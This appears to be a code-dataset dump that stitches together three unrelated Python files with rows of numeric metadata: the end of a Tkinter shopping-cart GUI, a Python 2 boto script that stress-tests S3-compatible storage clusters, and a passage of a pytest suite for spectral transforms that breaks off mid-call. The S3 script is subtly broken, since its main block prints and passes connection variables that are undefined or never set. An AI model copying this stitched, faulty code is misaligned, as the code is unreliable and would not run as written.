label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
elif (input.lower() == "error"):
popup = tk.Tk()
popup.wm_title("Sorry!")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Sorry, service is unavailable", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.show_frame(Navigation)
class Checkout(tk.Frame):
def __init__(self, parent, controller):
tk.Frame.__init__(self,parent)
label = tk.Label(self, text="Your Shopping Cart", font=(font_name, 12, 'bold'))
label.place(relx = 0.27, rely = 0.075, anchor = 'center')
self.build_tree()
button = tk.Button(self, text="Update", font=(font_name, 10), width=21, height=1, command=lambda: self.update(controller))
button.place(relx = 0.7, rely = 0.075, anchor = 'center')
button = tk.Button(self, text="Return", font=(font_name, 10), width=21, height=1, command=lambda: controller.show_frame(Opening))
button.place(relx = 0.3, rely = 0.9, anchor = 'center')
button = tk.Button(self, text="Finish", font=(font_name, 10), width=21, height=1, command=lambda: self.popup(controller))
button.place(relx = 0.7, rely = 0.9, anchor = 'center')
def build_tree(self):
shopping_list = nao.receipt()
cols = ('No.', 'Item', 'Qty.', 'Price', 'Total')
table = ttk.Treeview(self, columns = cols, show = 'headings', height=14)
table.place(relx = 0.5, rely = 0.125, anchor = 'n')
for i in table.get_children():
table.delete(i)
table.column(cols[0], width = 30, anchor = 'center')
table.column(cols[1], width = 225, anchor = 'w')
table.column(cols[2], width = 30, anchor = 'center')
table.column(cols[3], width = 40, anchor = 'center')
table.column(cols[4], width = 50, anchor = 'center')
table.heading(cols[0], text = cols[0])
table.heading(cols[1], text = cols[1], anchor = 'w')
table.heading(cols[2], text = cols[2])
table.heading(cols[3], text = cols[3])
table.heading(cols[4], text = cols[4])
total = 0
for i in range(len(shopping_list)):
value = shopping_list[i]['quantity']*shopping_list[i]['price']
total += value
table.insert("", "end", values=(i+1, shopping_list[i]['item'], shopping_list[i]['quantity'], shopping_list[i]['price'], str(value)+'NTD' ))
label = tk.Label(self, text="Total:", font=(font_name, 10))
label.place(relx = 0.12, rely = 0.84, anchor = 'w')
label = tk.Label(self, text=str(total)+' NTD', font=(font_name, 10))
label.place(relx = 0.88, rely = 0.84, anchor = 'e')
def update(self, controller):
self.build_tree()
controller.show_frame(Checkout)
def popup(self, controller):
popup = tk.Tk()
popup.wm_title("Goodbye~")
popup.geometry("275x100")
label = ttk.Label(popup, text = "Thank you for shopping with us!", font=(font_name, 10))
label.place(relx = 0.5, rely = 0.3, anchor = 'center')
button = tk.Button(popup, text="Okay", font=(font_name, 10), width=10, height=1, command=lambda: self.finish(controller, popup))
button.place(relx = 0.5, rely = 0.7, anchor = 'center')
def finish(self, controller, popup):
popup.destroy()
controller.destroy()
#---------------------main---------------------------
if __name__=='__main__':
app = MainApp()
app.title('mBot Market')
app.geometry('500x450+300+300')
app.mainloop()
| 47.5852
| 152
| 0.561838
| 5,958
| 48,870
| 4.525176
| 0.075361
| 0.053856
| 0.043767
| 0.047773
| 0.849412
| 0.842884
| 0.837654
| 0.833834
| 0.825563
| 0.821928
| 0
| 0.041503
| 0.282136
| 48,870
| 1,026
| 153
| 47.631579
| 0.727011
| 0.010211
| 0
| 0.765046
| 0
| 0
| 0.108362
| 0.004902
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.017361
| 0.001157
| 0.107639
| 0.002315
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b5050360880f266454416dc4fb09402131c8bd57
| 28,891
|
py
|
Python
|
test/client_copy_multithreaded.py
|
flipkart-incubator/cerebro
|
e28e04b375d0236b0e24dc94e92a2e29b882319a
|
[
"Apache-2.0"
] | null | null | null |
test/client_copy_multithreaded.py
|
flipkart-incubator/cerebro
|
e28e04b375d0236b0e24dc94e92a2e29b882319a
|
[
"Apache-2.0"
] | null | null | null |
test/client_copy_multithreaded.py
|
flipkart-incubator/cerebro
|
e28e04b375d0236b0e24dc94e92a2e29b882319a
|
[
"Apache-2.0"
] | 1
|
2021-06-10T04:04:01.000Z
|
2021-06-10T04:04:01.000Z
|
import boto
import boto.s3.connection
import random
from boto.s3.key import Key
import logging
import time
import os
import math
import string
import random
import copy
import hashlib
from Queue import Queue
from threading import Thread
from boto.s3.cors import CORSConfiguration
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
#Create a file handler
handler = logging.FileHandler('multiclient.log')
handler.setLevel(logging.INFO)
# create a logging format
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(handler)
#Due to Pip related issues
#from rgwadmin import RGWAdmin
from filechunkio import FileChunkIO
#Initial Set of Tests
#Create a Bucket
#Write 10000 Small Objects < 100 KB (Random)
#Write 10000 Medium Objects < 1 - 10 MB (Random)
#Write 10000 Large Objects < 10 - 200 MB (Random)
#Get Objetcs
#Do MD5SUM
#Delete Obejects
#Bucket Listing Should Be zero
#Extend Test Case (Create Bucket Every 30 Mins)
#Repeat the Steps
#How to Catch Error
#Intially log all the errors
#Then Start Logging all the error codes as well
class PoolWorker(Thread):
def __init__(self,queue):
super(PoolWorker,self).__init__()
self._q=queue
# Start as a BackGround Thread
self.daemon=True
self.start()
#Overridden Run Method
def run(self):
logger.info('Starting Thread')
#Run Forever
while True:
#Block on the Queue for Some Task, Queue is Synchronized (thread safe)
func,arg=self._q.get()
try:
#Execute the Task
func(*arg)
except Exception as e:
logger.error(e)
"""
Class Defining a Simple ThreadPool.
The Queue Size is init at the time of creation of the pool
The Enqueue Thread Will Block if the Queue if Full,
automatically backpressuring the system
Current Queue Size = 4, could be changed when system is tested
across various conigurations
"""
class ThreadPool(object):
def __init__(self,num_th):
self._q=Queue(num_th)
for _ in range(num_th):
PoolWorker(self._q)
def add_task(self,func,args):
try:
#Queue the Task
self._q.put((func,args))
except Exception as e:
logger.error(e)
ctr=0
mpuctr=0
ctr=0
s3_conn=0
def startMPUTest(s3_conn, s3_conn_1, size):
global mpuctr
logger.info("Running MPU Test for Iteration -> "+str(mpuctr))
mpuctr = mpuctr + 1
#Create The Bucket
chars = string.ascii_lowercase + string.digits
pwdSize = 24
bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
logger.info("Bucket Name -> "+bucket_name)
try:
s3_conn.create_bucket(bucket_name)
except Exception, e:
print e
return
logger.info("Bucket Created -> "+bucket_name)
try:
bucket = s3_conn.get_bucket(bucket_name)
bucket1 = s3_conn_1.get_bucket(bucket_name)
except Exception, e:
logger.error("Caught Exception in Get Bucket")
logger.error(e)
try:
#Start Multippart Upload
filesize=200000000
with open("mpuobj.data", "wb") as fout:
fout.write(os.urandom(200000000))
chunksize=12000000
chunkcount = int(math.ceil(filesize/chunksize))
header = {
'x-archive-queue-derive': '0'
}
mp = bucket.initiate_multipart_upload(os.path.basename("mpuobj.data"),headers=header)
for i in range (chunkcount + 1):
offset = chunksize * i
bytes = min(chunksize, filesize - offset)
with FileChunkIO( "mpuobj.data", 'r', offset=offset, bytes=bytes ) as fp:
mp.upload_part_from_file( fp, part_num=i + 1, headers=header )
logger.info("MultiPart Upload in progress for Iteration "+str(i))
mp.complete_upload()
except Exception, e:
logger.error("Caught Exception in Uploading MPU Object")
logger.error(e)
logger.info("MultiPart Upload Done")
#Get the File From Cluster
try:
objkey = bucket.get_key("mpuobj.data")
toFileName = 'getobjs/'+"mpuobj.data"
#print toFileName
objkey.get_contents_to_filename(toFileName)
logger.info("Got MPU File")
except Exception, e:
logger.error("Caught Exception in Getting file from Cluster ->"+"mpuobj.data")
try:
objkey = bucket1.get_key("mpuobj.data")
toFileName = 'getobjs1/'+"mpuobj.data"
#print toFileName
objkey.get_contents_to_filename(toFileName)
logger.info("Got MPU File 1")
except Exception, e:
logger.error("Caught Exception in Getting file from Cluster 1->"+"mpuobj.data")
time.sleep(90)
try:
bucket.delete_key("mpuobj.data")
time.sleep(30)
s3_conn.delete_bucket(bucket)
except Exception, e:
logger.error("Error In Deleting MPU Object")
def startSpecialObjectTest(s3_conn, s3_conn_1, sizeObj):
global ctr
longstrpath = "/some/file/long/dir/dcdcdcdxxxsxs/ccxc/"
logger.info("Start Special Running Test for Iteration -> "+str(ctr))
ctr = ctr + 1
objectDict = {}
bucket=0
bucket1=0
for i in range (128):
chars = string.letters + string.digits
pwdSize = 32
fileName = ''.join((random.choice(chars)) for x in range(pwdSize))
fileName = fileName + ".data"
if i%2 == 0 :
fileName = fileName + "!*$ "
else :
fileName = fileName + " " + "!*&%" + "fileName"
objectDict[i]=fileName
#Print the Dict
#for key in objectDict.keys():
#print key, objectDict[key]
#Create The Bucket
chars = string.ascii_lowercase + string.digits
pwdSize = 24
bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
logger.info("Bucket Name -> "+bucket_name)
try:
s3_conn.create_bucket(bucket_name)
except Exception, e:
logger.error("Bucket Name Create Exception -> "+bucket_name)
logger.error(e)
return
logger.info("Bucket Created -> "+bucket_name)
time.sleep(10)
#Create the Object Locally
for key in objectDict.keys():
try:
size = random.randint(1024, 900000)
with open(objectDict[key], "wb") as fout:
fout.write(os.urandom(size))
except Exception, e:
logger.error("Caught Exception in Creating Data Objects")
logger.error(e)
try:
bucket = s3_conn.get_bucket(bucket_name)
bucket1 = s3_conn_1.get_bucket(bucket_name)
except Exception, e:
logger.error("Caught Exception in Get Bucket")
logger.error(e)
#Upload the File to Cluster
for key in objectDict.keys():
time.sleep(1)
try:
obj_name = objectDict[key]
objkey = bucket.new_key(longstrpath+obj_name)
objkey.set_contents_from_filename(obj_name)
logger.info("Uplaoded Special Char-->"+obj_name)
except Exception, e:
logger.error("Caught Exception in Uploading file to Cluster ->"+objectDict[key])
logger.error(e)
#List Bucket
for objkey in bucket.list():
objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
size = objkey.size,
modified = objkey.last_modified,
)
logger.debug(objinfo)
#Get the File From Cluster
for key in objectDict.keys():
time.sleep(1)
try:
objkey = bucket.get_key(longstrpath+objectDict[key])
toFileName = 'getobjs/'+objectDict[key]
#print toFileName
objkey.get_contents_to_filename(toFileName)
except Exception, e:
logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
logger.error(e)
#Get the File From Cluster 1
for key in objectDict.keys():
time.sleep(1)
try:
objkey = bucket1.get_key(longstrpath+objectDict[key])
toFileName = 'getobjs1/'+objectDict[key]
#print toFileName
objkey.get_contents_to_filename(toFileName)
except Exception, e:
logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
logger.error(e)
#Perfom MD5sum Local and Copied File
for key in objectDict.keys():
try:
#MD5 of Local Objects
hash_md5_local = hashlib.md5()
with open(objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_local.update(chunk)
hash_md5_local_digest = hash_md5_local.hexdigest()
#Md5 of Remote Objects
hash_md5_remote = hashlib.md5()
with open('getobjs/'+objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_remote.update(chunk)
hash_md5_remote_digest = hash_md5_remote.hexdigest()
if hash_md5_local_digest == hash_md5_remote_digest :
logger.debug("MD5 Matches for Special")
else:
logger.error("MD5 MISMATCH for Object-> "+objectDict[key])
logger.error("Local MD5-> "+ hash_md5_local_digest)
logger.error("Remote MD5-> "+ hash_md5_remote_digest)
except Exception, e:
logger.error("Exception While Handling Md5SUM")
logger.error(e)
#Perfom MD5sum Local and Copied File on 1
for key in objectDict.keys():
try:
#MD5 of Local Objects
hash_md5_local = hashlib.md5()
with open(objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_local.update(chunk)
hash_md5_local_digest = hash_md5_local.hexdigest()
#Md5 of Remote Objects
hash_md5_remote = hashlib.md5()
with open('getobjs1/'+objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_remote.update(chunk)
hash_md5_remote_digest = hash_md5_remote.hexdigest()
if hash_md5_local_digest == hash_md5_remote_digest :
logger.debug("MD5 Matches for Special 1")
else:
logger.error("MD5 MISMATCH for Object 1-> "+objectDict[key])
logger.error("Local MD5 1 -> "+ hash_md5_local_digest)
logger.error("Remote MD5 1-> "+ hash_md5_remote_digest)
except Exception, e:
logger.error("Exception While Handling Md5SUM")
logger.error(e)
#Delete File From Cluster
for key in objectDict.keys():
time.sleep(1)
try:
bucket.delete_key(longstrpath+objectDict[key])
except Exception, e:
logger.error("Caught Exception in Deleting Object")
logger.error(e)
#Remove the File Locally
for key in objectDict.keys():
try:
os.remove(objectDict[key])
except Exception, e:
logger.error("Caught Exception in Removing Object")
logger.error(e)
#Remove the File From GetObj Dir
for key in objectDict.keys():
try:
os.remove('getobjs/'+objectDict[key])
os.remove('getobjs1/'+objectDict[key])
except Exception, e:
logger.error("Caught Exception in Removing Object from getObjs")
logger.error(e)
#List Bucket
logger.debug("Listing Buckets Should Be Empty for -> " + bucket_name)
for objkey in bucket.list():
objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
size = objkey.size,
modified = objkey.last_modified,
)
logger.error("ERRORED: Object Found" + objinfo)
#Finally Remove the Bucket
try:
s3_conn.delete_bucket(bucket_name)
logger.error("Bucket Deleted -> " + bucket_name)
except Exception, e:
logger.error("Exception while Deleting bucker ->" + bucket_name)
logger.error(e)
def startObjectTest(s3_conn, s3_conn_1, sizeObj):
global ctr
logger.info("Start Object TEst Running Test for Iteration -> "+str(ctr))
ctr = ctr + 1
objectDict = {}
bucket=0
bucket1=0
for i in range (128):
chars = string.letters + string.digits
pwdSize = 32
fileName = ''.join((random.choice(chars)) for x in range(pwdSize))
fileName = fileName + ".data"
objectDict[i]=fileName
#Print the Dict
#for key in objectDict.keys():
#print key, objectDict[key]
#Create The Bucket
chars = string.ascii_lowercase + string.digits
pwdSize = 24
bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
logger.info("Bucket Name -> "+bucket_name)
try:
s3_conn.create_bucket(bucket_name)
except Exception, e:
logger.error("Bucket Name Create Exception -> "+bucket_name)
logger.error(e)
return
logger.info("Bucket Created -> "+bucket_name)
#Create the Object Locally
for key in objectDict.keys():
try:
size = random.randint(1024, 900000)
with open(objectDict[key], "wb") as fout:
fout.write(os.urandom(size))
except Exception, e:
logger.error("Caught Exception in Creating Data Objects")
logger.error(e)
try:
bucket = s3_conn.get_bucket(bucket_name)
bucket1 = s3_conn_1.get_bucket(bucket_name)
except Exception, e:
logger.error("Caught Exception in Get Bucket")
logger.error(e)
#Upload the File to Cluster
for key in objectDict.keys():
time.sleep(1)
try:
obj_name = objectDict[key]
objkey = bucket.new_key(obj_name)
objkey.set_contents_from_filename(obj_name)
logger.info("Uploaded Object "+obj_name)
except Exception, e:
logger.error("Caught Exception in Uploading file to Cluster ->"+objectDict[key])
logger.error(e)
#List Bucket
for objkey in bucket.list():
objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
size = objkey.size,
modified = objkey.last_modified,
)
logger.debug(objinfo)
#Get the File From Cluster
for key in objectDict.keys():
time.sleep(1)
try:
objkey = bucket.get_key(objectDict[key])
toFileName = 'getobjs/'+objectDict[key]
#print toFileName
objkey.get_contents_to_filename(toFileName)
logger.info("GOt Object from "+obj_name)
except Exception, e:
logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
logger.error(e)
#Perfom MD5sum Local and Copied File
for key in objectDict.keys():
try:
#MD5 of Local Objects
hash_md5_local = hashlib.md5()
with open(objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_local.update(chunk)
hash_md5_local_digest = hash_md5_local.hexdigest()
#Md5 of Remote Objects
hash_md5_remote = hashlib.md5()
with open('getobjs/'+objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_remote.update(chunk)
hash_md5_remote_digest = hash_md5_remote.hexdigest()
if hash_md5_local_digest == hash_md5_remote_digest :
logger.info("MD5 Matches for ->" + objectDict[key])
else:
logger.error("MD5 MISMATCH for Object-> "+objectDict[key])
logger.error("Local MD5-> "+ hash_md5_local_digest)
logger.error("Remote MD5-> "+ hash_md5_remote_digest)
except Exception, e:
logger.error("Exception While Handling Md5SUM")
logger.error(e)
#Delete File From Cluster
for key in objectDict.keys():
time.sleep(1)
try:
bucket.delete_key(objectDict[key])
except Exception, e:
logger.error("Caught Exception in Deleting Object")
logger.error(e)
#Remove the File Locally
for key in objectDict.keys():
try:
os.remove(objectDict[key])
except Exception, e:
logger.error("Caught Exception in Removing Object")
logger.error(e)
#Remove the File From GetObj Dir
for key in objectDict.keys():
try:
os.remove('getobjs/'+objectDict[key])
except Exception, e:
logger.error("Caught Exception in Removing Object from getObjs")
logger.error(e)
#List Bucket
logger.debug("Listing Buckets Should Be Empty for -> " + bucket_name)
for objkey in bucket.list():
objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
size = objkey.size,
modified = objkey.last_modified,
)
logger.error("ERRORED: Object Found" + objinfo)
#Finally Remove the Bucket
try:
s3_conn.delete_bucket(bucket_name)
logger.info("Bucket Deleted -> " + bucket_name)
except Exception, e:
logger.error("Exception while Deleting bucker ->" + bucket_name)
logger.error(e)
def startaclcorstest(s3_conn, s3_conn_1, size):
global ctr
logger.info("Running Test for Iteration -> "+str(ctr))
ctr = ctr + 1
size = 16345
objectDict = {}
for i in range (16):
chars = string.letters + string.digits
pwdSize = 32
fileName = ''.join((random.choice(chars)) for x in range(pwdSize))
fileName = fileName + ".data"
objectDict[i]=fileName
#Print the Dict
#for key in objectDict.keys():
#print key, objectDict[key]
#Create The Bucket
chars = string.ascii_lowercase + string.digits
pwdSize = 24
bucket_name = ''.join((random.choice(chars)) for x in range(pwdSize))
logger.info("Bucket Name -> "+bucket_name)
try:
s3_conn.create_bucket(bucket_name)
except Exception, e:
logger.error("Bucket Name Create Exception -> "+bucket_name)
logger.error(e)
return
logger.info("Bucket Created -> "+bucket_name)
#Create the Object Locally
for key in objectDict.keys():
try:
with open(objectDict[key], "wb") as fout:
fout.write(os.urandom(size))
except Exception, e:
logger.error("Caught Exception in Creating Data Objects")
logger.error(e)
bucket = s3_conn.get_bucket(bucket_name)
bucket1 = s3_conn_1.get_bucket(bucket_name)
logger.info("Now Setting the CORS CONFIG")
try:
cors_cfg = CORSConfiguration()
cors_cfg.add_rule(['PUT', 'POST', 'DELETE'], 'https://www.example.com', allowed_header='*', max_age_seconds=3000, expose_header='x-amz-server-side-encryption')
cors_cfg.add_rule('GET', '*')
bucket.set_cors(cors_cfg)
logger.info("Set Config CORS For Bucket Sucess ->"+bucket_name)
except Exception, e:
logger.error("Error in Setting Cors Config")
logger.info("Lets Get the CORS CONFIG")
try:
l_cors_cfg = bucket.get_cors_xml()
logger.info("got Cors Cfg")
logger.info(l_cors_cfg)
except Exception, e:
logger.error("Error In Getting CORS CONFIG FOR BUCKET ->"+bucket_name)
logger.info("Lets Get the CORS CONFIG 1")
try:
l_cors_cfg = bucket1.get_cors_xml()
logger.info("got Cors Cfg1")
logger.info(l_cors_cfg)
except Exception, e:
logger.error("Error In Getting CORS CONFIG FOR BUCKET ->"+bucket_name)
#Upload the File to Cluster
for key in objectDict.keys():
time.sleep(1)
try:
obj_name = objectDict[key]
objkey = bucket.new_key(obj_name)
objkey.set_contents_from_filename(obj_name)
logger.info("Suucess Uploading file to Cluster ->"+objectDict[key])
except Exception, e:
logger.error("Caught Exception in Uploading file to Cluster ->"+objectDict[key])
logger.error(e)
#List Bucket
for objkey in bucket.list():
objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
size = objkey.size,
modified = objkey.last_modified,
)
logger.debug(objinfo)
#Get the File From Cluster
for key in objectDict.keys():
time.sleep(1)
try:
objkey = bucket.get_key(objectDict[key])
toFileName = 'getobjs/'+objectDict[key]
#print toFileName
objkey.get_contents_to_filename(toFileName)
logger.info("Success Getting file from Cluster ->"+objectDict[key])
except Exception, e:
logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
logger.error(e)
#Get the File From Cluster1
for key in objectDict.keys():
time.sleep(1)
try:
objkey = bucket1.get_key(objectDict[key])
toFileName = 'getobjs/'+objectDict[key]
#print toFileName
objkey.get_contents_to_filename(toFileName)
logger.info("Success Getting file from Cluster 1->"+objectDict[key])
except Exception, e:
logger.error("Caught Exception in Getting file from Cluster ->"+objectDict[key])
logger.error(e)
#Peform Set Acl Canned
ctr=0
for key in objectDict.keys():
try:
if ctr%2 == 0:
objkey = bucket.get_key(objectDict[key])
bucket.set_acl('public-read', objkey)
logger.info("Set PUBLIC Canned ACl for -->"+objectDict[key])
logger.info("Begin Lookup")
getacl = objkey.get_acl()
ctr = ctr + 1
#
#for grant in getacl.acl.grants:
#logger.info("Gpermission ->" + grant.permission)
#logger.info("G Display Name ->" + grant.display_name)
#logger.info("GEMail ID ->" + grant.email_address)
#logger.info("GID ->" + grant.id)
except Exception, e:
logger.error("Error In Setting Canned Acls")
logger.info("Waiting for 3")
time.sleep(3)
#Peform Set Acl Canned 1
ctr=0
for key in objectDict.keys():
try:
if ctr%2 == 0:
objkey = bucket1.get_key(objectDict[key])
bucket1.set_acl('public-read', objkey)
logger.info("Set PUBLIC Canned ACl for 1 -->"+objectDict[key])
logger.info("Begin Lookup")
getacl = objkey.get_acl()
logger.info("Link is-->" + bucket_name +"/" + objectDict[key])
ctr = ctr + 1
#
#for grant in getacl.acl.grants:
#logger.info("Gpermission ->" + grant.permission)
#logger.info("G Display Name ->" + grant.display_name)
#logger.info("GEMail ID ->" + grant.email_address)
#logger.info("GID ->" + grant.id)
except Exception, e:
logger.error("Error In Setting Canned Acls 1")
time.sleep(120)
#Perfom MD5sum Local and Copied File
for key in objectDict.keys():
try:
#MD5 of Local Objects
hash_md5_local = hashlib.md5()
with open(objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_local.update(chunk)
hash_md5_local_digest = hash_md5_local.hexdigest()
#Md5 of Remote Objects
hash_md5_remote = hashlib.md5()
with open('getobjs/'+objectDict[key], "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5_remote.update(chunk)
hash_md5_remote_digest = hash_md5_remote.hexdigest()
if hash_md5_local_digest == hash_md5_remote_digest :
logger.info("MD5 Matches for ->" +objectDict[key])
else:
logger.error("MD5 MISMATCH for Object-> "+objectDict[key])
logger.error("Local MD5-> "+ hash_md5_local_digest)
logger.error("Remote MD5-> "+ hash_md5_remote_digest)
except Exception, e:
logger.error("Exception While Handling Md5SUM")
logger.error(e)
#Delete File From Cluster
for key in objectDict.keys():
time.sleep(1)
try:
bucket.delete_key(objectDict[key])
logger.info("Success in Deleting Object from -> " +objectDict[key])
except Exception, e:
logger.error("Caught Exception in Deleting Object")
logger.error(e)
#Remove the File Locally
for key in objectDict.keys():
try:
os.remove(objectDict[key])
except Exception, e:
logger.error("Caught Exception in Removing Object")
logger.error(e)
#Remove the File From GetObj Dir
for key in objectDict.keys():
try:
os.remove('getobjs/'+objectDict[key])
except Exception, e:
logger.error("Caught Exception in Removing Object from getObjs")
logger.error(e)
#List Bucket
logger.debug("Listing Buckets Should Be Empty for -> " + bucket_name)
for objkey in bucket.list():
objinfo = "{name}\t{size}\t{modified}".format(name = objkey.name,
size = objkey.size,
modified = objkey.last_modified,
)
logger.error("ERRORED: Object Found" + objinfo)
"""
try:
logger.info("Now Trying to make the Bucket Public")
bucket.set_acl('public-read')
logger.info("Set the Bucket as Public")
except Exception, e:
logger.error("Exception in Setting Public Acl to the Bucket")
logger.error(e)
logger.info("Sleeping For Some Time Beofre Deleteing")
"""
time.sleep(10)
#Finally Remove the Bucket
try:
s3_conn.delete_bucket(bucket_name)
logger.error("Bucket Deleted -> " + bucket_name)
except Exception, e:
logger.error("Exception while Deleting bucker ->" + bucket_name)
logger.error(e)
if __name__ == "__main__":
try:
src_conn = boto.connect_s3(aws_access_key_id='XXXXXXXXXXXX',
aws_secret_access_key='XXXXXXXXXx', host="XXXXXXXx",
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
print src_conn
dst_conn_1 = boto.connect_s3(aws_access_key_id='XXXXXXXXxx',
aws_secret_access_key='XXXXXXXXx', host="XXXXXXXXX",
is_secure=False,
calling_format=boto.s3.connection.OrdinaryCallingFormat())
print dst_conn
handle_thPool=ThreadPool(1)
while True:
#Do Forever or Until Conditions Breaks
handle_thPool.add_task(startObjectTest,[s3_conn,s3_conn_1,"4000",])
#handle_thPool.add_task(startObjectTest,[s3_conn,s3_conn_1,"4000",])
#handle_thPool.add_task(startSpecialObjectTest,[s3_conn,s3_conn_1,"200000",])
#handle_thPool.add_task(startMPUTest,[s3_conn,s3_conn_1,"200000",])
#handle_thPool.add_task(startaclcorstest,[s3_conn,s3_conn_1,"200000",])
except Exception, e:
print("Caught Exception in Main")
print e
| 35.71199
| 168
| 0.580111
| 3,367
| 28,891
| 4.858331
| 0.111375
| 0.065228
| 0.033011
| 0.057831
| 0.791478
| 0.777846
| 0.758589
| 0.73542
| 0.7246
| 0.717325
| 0
| 0.019869
| 0.320584
| 28,891
| 808
| 169
| 35.756188
| 0.81349
| 0.099547
| 0
| 0.746087
| 0
| 0
| 0.148158
| 0.009703
| 0.003478
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.027826
| null | null | 0.008696
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82eca8312e2c0b103ba5df9aad7856414f22718e
| 9,363
|
py
|
Python
|
test/SpectralTransformer_test.py
|
JamieJQuinn/Melvin-python
|
4094e2c21e302304d75a961f14887edbbfba2964
|
[
"MIT"
] | 2
|
2021-05-27T16:49:59.000Z
|
2021-09-25T01:41:41.000Z
|
test/SpectralTransformer_test.py
|
JamieJQuinn/Melvin-python
|
4094e2c21e302304d75a961f14887edbbfba2964
|
[
"MIT"
] | 7
|
2021-05-03T15:55:32.000Z
|
2021-05-18T17:20:57.000Z
|
test/SpectralTransformer_test.py
|
JamieJQuinn/Melvin.py
|
4094e2c21e302304d75a961f14887edbbfba2964
|
[
"MIT"
] | null | null | null |
import numpy as np
import pytest
from pytest import approx
from numpy.testing import assert_array_almost_equal
from melvin import BasisFunctions, ArrayFactory, SpectralTransformer
@pytest.fixture
def periodic_coordinates(parameters):
p = parameters
x = np.linspace(0, 1.0, p.nx, endpoint=False)
z = np.linspace(0, 1.0, p.nz, endpoint=False)
X, Z = np.meshgrid(x, z, indexing="ij")
return X, Z
@pytest.fixture
def coordinates(parameters):
p = parameters
x = np.linspace(0, 1.0, p.nx)
z = np.linspace(0, 1.0, p.nz)
X, Z = np.meshgrid(x, z, indexing="ij")
return X, Z
def test_transform_periodic(arrays, st, periodic_coordinates):
spectral, physical = arrays
X, Z = periodic_coordinates
true_physical = np.cos(2 * np.pi * X) + 2.0 * np.sin(2 * 2 * np.pi * Z)
st.to_spectral(
true_physical,
spectral,
basis_functions=[
BasisFunctions.COMPLEX_EXP,
BasisFunctions.COMPLEX_EXP,
],
)
true_spectral = np.zeros_like(spectral)
# These values are those in front of cosine divided by two
true_spectral[1, 0] = 1.0 / 2.0
true_spectral[-1, 0] = 1.0 / 2.0 # complex conjugate is also calculated
# Sine coefficients are complex, negative and also divided by two
true_spectral[0, 2] = 2.0j / -2.0
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[
BasisFunctions.COMPLEX_EXP,
BasisFunctions.COMPLEX_EXP,
],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_cosine_x_periodic_z(arrays, st, parameters):
spectral, physical = arrays
p = parameters
x = np.linspace(0, 1.0, p.nx)
z = np.linspace(0, 1.0, p.nz, endpoint=False)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = np.cos(np.pi * X) + 2.0 * np.cos(2 * np.pi * X)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.COSINE, BasisFunctions.COMPLEX_EXP],
)
true_spectral = np.zeros_like(spectral)
true_spectral[1, 0] = 1.0
true_spectral[2, 0] = 2.0
true_spectral[-1, 0] = 1.0
true_spectral[-2, 0] = 2.0
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
basis_functions=[BasisFunctions.COSINE, BasisFunctions.COMPLEX_EXP],
)
assert_array_almost_equal(physical, true_physical)
def test_transform_periodic_x_cosine_z(arrays, st, parameters):
spectral, physical = arrays
p = parameters
x = np.linspace(0, 1.0, p.nx, endpoint=False)
z = np.linspace(0, 1.0, p.nz)
X, Z = np.meshgrid(x, z, indexing="ij")
true_physical = np.cos(np.pi * Z) + 2.0 * np.cos(2 * np.pi * Z)
st.to_spectral(
true_physical,
spectral,
basis_functions=[BasisFunctions.COMPLEX_EXP, BasisFunctions.COSINE],
)
true_spectral = np.zeros_like(spectral)
true_spectral[0, 1] = 1.0
true_spectral[0, 2] = 2.0
assert_array_almost_equal(spectral, true_spectral)
st.to_physical(
spectral,
physical,
